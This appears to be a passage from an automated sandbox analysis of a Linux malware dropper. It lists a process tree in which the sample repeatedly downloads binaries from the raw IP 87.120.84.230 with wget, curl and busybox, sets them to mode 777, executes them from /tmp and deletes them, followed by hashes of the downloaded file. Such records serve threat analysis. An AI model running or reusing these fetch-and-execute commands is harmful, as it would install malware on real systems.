/usr/bin/wgetwget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:948
-
-
/bin/chmodchmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:954
-
-
/bin/chmodchmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:960
-
-
/bin/chmodchmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:966
-
-
/bin/chmodchmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:972
-
-
/bin/chmodchmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:978
-
-
/bin/chmodchmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:984
-
-
/bin/chmodchmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:987
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97